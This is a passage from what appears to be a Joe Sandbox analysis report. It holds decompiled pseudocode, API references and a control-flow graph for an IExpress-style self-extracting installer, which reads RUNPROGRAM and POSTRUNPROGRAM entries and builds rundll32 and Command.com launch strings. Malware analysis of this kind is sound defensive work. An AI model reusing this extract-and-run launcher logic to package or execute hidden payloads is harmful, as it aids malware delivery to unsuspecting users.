                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0xf88180;
                                                                        											if( *0xf88180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E00F844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0xf89124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0xf89a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E00F86495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E00F844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0xf89124 = E00F86285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E00F844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0xf88a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0xf89a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0xf88a38 & 0x0000ffff;
                                                                        											_v380 = 0xf89154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0xf891e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0xf88a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0xf89a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0xf88d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0xf89a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0xf8a288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0xf89124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0xf89a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0xf88a20;
                                                                        										if( *0xf88a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E00F8202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E00F8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0xf88c42;
                                                                        									if( *0xf88c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0xf88a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F8468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E00F81781( &_v276, 0x104, _t130, 0xf88c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E00F8468F(_t130, 0xf89a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}





























































                                                                        0x00f83baa
                                                                        0x00f83bb0
                                                                        0x00f83bb7
                                                                        0x00f83bc0
                                                                        0x00f83bc2
                                                                        0x00f83bc9
                                                                        0x00f83bcb
                                                                        0x00f83bcf
                                                                        0x00f83bd3
                                                                        0x00f83bd9
                                                                        0x00f83bfd
                                                                        0x00f83bfd
                                                                        0x00f83bff
                                                                        0x00f83c03
                                                                        0x00f83c03
                                                                        0x00f83c11
                                                                        0x00f83c16
                                                                        0x00f83c19
                                                                        0x00f83c28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83c30
                                                                        0x00f83c39
                                                                        0x00f83c40
                                                                        0x00f83d13
                                                                        0x00f83d15
                                                                        0x00f83d21
                                                                        0x00f83d26
                                                                        0x00000000
                                                                        0x00f83c4f
                                                                        0x00f83c56
                                                                        0x00f83c60
                                                                        0x00f83c65
                                                                        0x00f83c77
                                                                        0x00f83c78
                                                                        0x00f83c7c
                                                                        0x00f83c7e
                                                                        0x00f83c82
                                                                        0x00f83c82
                                                                        0x00000000
                                                                        0x00f83c7c
                                                                        0x00f83c67
                                                                        0x00f83c69
                                                                        0x00f83c6d
                                                                        0x00000000
                                                                        0x00f83c58
                                                                        0x00f83c58
                                                                        0x00f83c6e
                                                                        0x00f83c6e
                                                                        0x00f83c87
                                                                        0x00f83c89
                                                                        0x00f83d4d
                                                                        0x00f83d4f
                                                                        0x00f83d50
                                                                        0x00f83d52
                                                                        0x00f83d9e
                                                                        0x00f83da8
                                                                        0x00f83daf
                                                                        0x00f83db4
                                                                        0x00f83db6
                                                                        0x00f83f4d
                                                                        0x00f83f4d
                                                                        0x00f83f4f
                                                                        0x00f83f56
                                                                        0x00f83f57
                                                                        0x00f83f58
                                                                        0x00f83f63
                                                                        0x00f83f63
                                                                        0x00f83dbc
                                                                        0x00f83dc0
                                                                        0x00f83dc2
                                                                        0x00f83de6
                                                                        0x00f83de6
                                                                        0x00f83de8
                                                                        0x00f83f0b
                                                                        0x00f83f0b
                                                                        0x00f83f0f
                                                                        0x00f83f13
                                                                        0x00f83f15
                                                                        0x00f83f1a
                                                                        0x00f83f1c
                                                                        0x00f83f46
                                                                        0x00f83f47
                                                                        0x00000000
                                                                        0x00f83f47
                                                                        0x00f83f1e
                                                                        0x00f83f1f
                                                                        0x00f83f25
                                                                        0x00f83f26
                                                                        0x00f83f2a
                                                                        0x00f83f2d
                                                                        0x00f83fd9
                                                                        0x00f83fd9
                                                                        0x00f83fda
                                                                        0x00f83fda
                                                                        0x00f83fe1
                                                                        0x00f83fe3
                                                                        0x00f83fe3
                                                                        0x00f83fe8
                                                                        0x00000000
                                                                        0x00f83fe8
                                                                        0x00f83f33
                                                                        0x00f83f37
                                                                        0x00000000
                                                                        0x00f83f37
                                                                        0x00f83dee
                                                                        0x00f83dee
                                                                        0x00f83df5
                                                                        0x00f83fad
                                                                        0x00f83fb9
                                                                        0x00f83fc2
                                                                        0x00f83fc8
                                                                        0x00000000
                                                                        0x00f83fc8
                                                                        0x00f83dfb
                                                                        0x00f83dfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83e03
                                                                        0x00f83e0a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83e15
                                                                        0x00f83e17
                                                                        0x00f83e19
                                                                        0x00f83f94
                                                                        0x00f83fa4
                                                                        0x00f83f7c
                                                                        0x00f83f80
                                                                        0x00f83f8b
                                                                        0x00000000
                                                                        0x00f83f8b
                                                                        0x00f83e2c
                                                                        0x00f83e30
                                                                        0x00f83e34
                                                                        0x00f83e36
                                                                        0x00f83f69
                                                                        0x00f83f6e
                                                                        0x00f83f70
                                                                        0x00f83f76
                                                                        0x00000000
                                                                        0x00f83f76
                                                                        0x00f83e3c
                                                                        0x00f83e43
                                                                        0x00f83e47
                                                                        0x00f83e52
                                                                        0x00f83e56
                                                                        0x00f83e5c
                                                                        0x00f83e61
                                                                        0x00f83e68
                                                                        0x00f83e70
                                                                        0x00f83e74
                                                                        0x00f83e7c
                                                                        0x00f83e80
                                                                        0x00f83e82
                                                                        0x00f83e82
                                                                        0x00f83e87
                                                                        0x00f83e87
                                                                        0x00f83e8b
                                                                        0x00f83e91
                                                                        0x00f83e94
                                                                        0x00f83e96
                                                                        0x00f83e96
                                                                        0x00f83e9b
                                                                        0x00f83e9b
                                                                        0x00f83e9f
                                                                        0x00f83ea2
                                                                        0x00f83ea4
                                                                        0x00f83ea4
                                                                        0x00f83ea9
                                                                        0x00f83ea9
                                                                        0x00f83ead
                                                                        0x00f83eb3
                                                                        0x00f83eb6
                                                                        0x00f83eb8
                                                                        0x00f83eb8
                                                                        0x00f83ebd
                                                                        0x00f83ebd
                                                                        0x00f83ec1
                                                                        0x00f83ec3
                                                                        0x00f83ec5
                                                                        0x00f83ec5
                                                                        0x00f83eca
                                                                        0x00f83eca
                                                                        0x00f83ece
                                                                        0x00f83ed5
                                                                        0x00f83ed9
                                                                        0x00f83ee0
                                                                        0x00f83ee6
                                                                        0x00f83eea
                                                                        0x00f83eec
                                                                        0x00f83eee
                                                                        0x00f83ef3
                                                                        0x00f83ef3
                                                                        0x00f83ef5
                                                                        0x00f83efa
                                                                        0x00f83efb
                                                                        0x00f83efd
                                                                        0x00f83f40
                                                                        0x00000000
                                                                        0x00f83eff
                                                                        0x00f83eff
                                                                        0x00f83f05
                                                                        0x00000000
                                                                        0x00f83f05
                                                                        0x00f83efd
                                                                        0x00f83dc7
                                                                        0x00f83dce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83dd0
                                                                        0x00f83dd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83dd9
                                                                        0x00f83ddb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83ddd
                                                                        0x00f83de1
                                                                        0x00000000
                                                                        0x00f83de1
                                                                        0x00f83d59
                                                                        0x00f83d65
                                                                        0x00f83d6a
                                                                        0x00f83d6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83d6e
                                                                        0x00f83d75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83d8f
                                                                        0x00f83d96
                                                                        0x00f83d98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83d98
                                                                        0x00f83c8f
                                                                        0x00f83c98
                                                                        0x00f83cf1
                                                                        0x00f83cf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83cfe
                                                                        0x00f83d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83d11
                                                                        0x00f83c9c
                                                                        0x00f83ca5
                                                                        0x00f83ca7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83cad
                                                                        0x00f83cb2
                                                                        0x00f83cb7
                                                                        0x00f83cc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83ce8
                                                                        0x00f83cec
                                                                        0x00f83ced
                                                                        0x00f83ced
                                                                        0x00000000
                                                                        0x00f83ce8
                                                                        0x00f83c9e
                                                                        0x00000000
                                                                        0x00f83c9e
                                                                        0x00f83c56
                                                                        0x00f83d35
                                                                        0x00f83d35
                                                                        0x00f83d3c
                                                                        0x00f83d48
                                                                        0x00000000
                                                                        0x00f83d48
                                                                        0x00f83c03
                                                                        0x00f83be2
                                                                        0x00f83be7
                                                                        0x00f83bee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F83C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F83CDC
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F88C42), ref: 00F83D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F83E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F88C42), ref: 00F83F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                                        • API String ID: 1032054927-1156627247
                                                                        • Opcode ID: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                        • Instruction ID: a568d07caecc8feb6d8a913719d33642b45830e34247fb3029338a0eecd9d0eb
                                                                        • Opcode Fuzzy Hash: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                        • Instruction Fuzzy Hash: 30B11371A083059BD724FF248C45BFB76E4EB85B60F00092EFA85D61A1EB74D905FB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 141 f81ae8-f81b2c call f81680 144 f81b3b-f81b40 141->144 145 f81b2e-f81b39 141->145 146 f81b46-f81b61 call f81a84 144->146 145->146 149 f81b9f-f81bc2 call f81781 call f8658a 146->149 150 f81b63-f81b65 146->150 157 f81bc7-f81bd3 call f866c8 149->157 152 f81b68-f81b6d 150->152 152->152 154 f81b6f-f81b74 152->154 154->149 156 f81b76-f81b7b 154->156 158 f81b7d-f81b81 156->158 159 f81b83-f81b86 156->159 166 f81bd9-f81bf1 CompareStringA 157->166 167 f81d73-f81d7f call f866c8 157->167 158->159 160 f81b8c-f81b9d call f81680 158->160 159->149 161 f81b88-f81b8a 159->161 160->157 161->149 161->160 166->167 168 f81bf7-f81c07 GetFileAttributesA 166->168 173 f81df8-f81e09 LocalAlloc 167->173 174 f81d81-f81d99 CompareStringA 167->174 170 f81c0d-f81c15 168->170 171 f81d53-f81d5e 168->171 170->171 176 f81c1b-f81c33 call f81a84 170->176 175 f81d64-f81d6e call f844b9 171->175 179 f81e0b-f81e1b GetFileAttributesA 173->179 180 f81dd4-f81ddf 173->180 174->173 178 f81d9b-f81da2 174->178 192 f81e94-f81ea4 call f86ce0 175->192 187 f81c50-f81c61 LocalAlloc 176->187 188 f81c35-f81c38 176->188 183 f81da5-f81daa 178->183 184 f81e1d-f81e1f 179->184 185 f81e67-f81e73 call f81680 179->185 180->175 183->183 189 f81dac-f81db4 183->189 184->185 191 f81e21-f81e3e call f81781 184->191 197 f81e78-f81e84 call f82aac 185->197 187->180 196 f81c67-f81c72 187->196 193 f81c3a 188->193 194 f81c40-f81c4b call f81a84 188->194 195 f81db7-f81dbc 189->195 191->197 207 f81e40-f81e43 191->207 193->194 194->187 195->195 201 f81dbe-f81dd2 LocalAlloc 195->201 202 f81c79-f81cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 f81c74 196->203 211 f81e89-f81e92 197->211 201->180 208 f81de1-f81df3 call f8171e 201->208 209 f81cf8-f81d07 202->209 210 f81cc2-f81ccc 202->210 203->202 207->197 212 f81e45-f81e65 call f816b3 * 2 207->212 208->211 213 f81d09-f81d21 GetShortPathNameA 209->213 214 f81d23 209->214 216 f81cce 210->216 217 f81cd3-f81cf3 call f81680 * 2 210->217 211->192 212->197 219 f81d28-f81d2b 213->219 214->219 216->217 217->211 223 f81d2d 219->223 224 f81d32-f81d4e call f8171e 219->224 223->224 224->211
                                                                        C-Code - Quality: 82%
                                                                        			E00F81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E00F81680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E00F81A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E00F81781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					E00F8658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E00F81680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E00F866C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E00F866C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E00F81680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E00F81781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E00F816B3( &_v1552, 0x400, " ");
                                                                        										E00F816B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E00F82AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E00F8171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E00F81A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E00F81A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E00F844B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0xf89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf81140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0xf89a34 =  *0xf89a34 & 0xfffffffb;
                                                                        										if( *0xf89a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E00F8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0xf89a34 =  *0xf89a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E00F81680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E00F81680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E00F86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}














































                                                                        0x00f81af3
                                                                        0x00f81afa
                                                                        0x00f81b07
                                                                        0x00f81b09
                                                                        0x00f81b1a
                                                                        0x00f81b20
                                                                        0x00f81b2c
                                                                        0x00f81b3b
                                                                        0x00f81b40
                                                                        0x00f81b2e
                                                                        0x00f81b2e
                                                                        0x00f81b33
                                                                        0x00f81b33
                                                                        0x00f81b46
                                                                        0x00f81b4c
                                                                        0x00f81b52
                                                                        0x00f81b57
                                                                        0x00f81b5d
                                                                        0x00f81b61
                                                                        0x00f81b9f
                                                                        0x00f81b9f
                                                                        0x00f81bb1
                                                                        0x00f81bc2
                                                                        0x00000000
                                                                        0x00f81b63
                                                                        0x00f81b63
                                                                        0x00f81b65
                                                                        0x00f81b68
                                                                        0x00f81b68
                                                                        0x00f81b6a
                                                                        0x00f81b6b
                                                                        0x00f81b6f
                                                                        0x00f81b74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f81b76
                                                                        0x00f81b7b
                                                                        0x00f81b86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f81b8c
                                                                        0x00f81b8c
                                                                        0x00f81b98
                                                                        0x00f81bc7
                                                                        0x00f81bc9
                                                                        0x00f81bcc
                                                                        0x00f81bd3
                                                                        0x00f81d75
                                                                        0x00f81d76
                                                                        0x00f81d78
                                                                        0x00f81d7f
                                                                        0x00f81e05
                                                                        0x00f81e09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f81e12
                                                                        0x00f81e1b
                                                                        0x00f81e73
                                                                        0x00f81e21
                                                                        0x00f81e21
                                                                        0x00f81e28
                                                                        0x00f81e37
                                                                        0x00f81e3e
                                                                        0x00f81e52
                                                                        0x00f81e60
